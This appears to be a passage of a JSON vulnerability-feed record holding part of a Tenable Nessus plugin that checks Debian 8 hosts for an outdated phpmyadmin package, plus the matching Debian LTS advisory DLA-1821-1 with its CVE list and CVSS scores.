value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security vulnerabilities were fixed in phpmyadmin, a MySQL\nweb administration tool, which prevent possible SQL injection attacks,\nCSRF, the bypass of user restrictions, information disclosure or\ndenial of service.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n4:4.2.12-2+deb8u6.\n\nWe recommend that you upgrade your phpmyadmin packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/06/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/phpmyadmin\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"phpmyadmin\", reference:\"4:4.2.12-2+deb8u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-06-18T02:21:20", "bulletinFamily": "unix", "description": "Package : phpmyadmin\nVersion : 4:4.2.12-2+deb8u6\nCVE ID : CVE-2016-6606 CVE-2016-6607 CVE-2016-6611 CVE-2016-6612\n CVE-2016-6613 CVE-2016-6624 CVE-2016-6626 CVE-2016-6627\n CVE-2016-6628 CVE-2016-6630 CVE-2016-6631 CVE-2016-6632\n CVE-2016-9849 CVE-2016-9850 CVE-2016-9861 CVE-2016-9864\n CVE-2019-12616\nDebian Bug : 930017\n\nMultiple security vulnerabilities were fixed in phpmyadmin, a MySQL web\nadministration tool, which prevent possible SQL injection attacks, CSRF,\nthe bypass of user restrictions, information disclosure or\ndenial-of-service.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n4:4.2.12-2+deb8u6.\n\nWe recommend that you upgrade your phpmyadmin packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2019-06-17T20:42:14", "published": "2019-06-17T20:42:14", "id": "DEBIAN:DLA-1821-1:AF0F6", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201906/msg00009.html", "title": "[SECURITY] [DLA 1821-1] phpmyadmin security update", "type": "debian", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}]}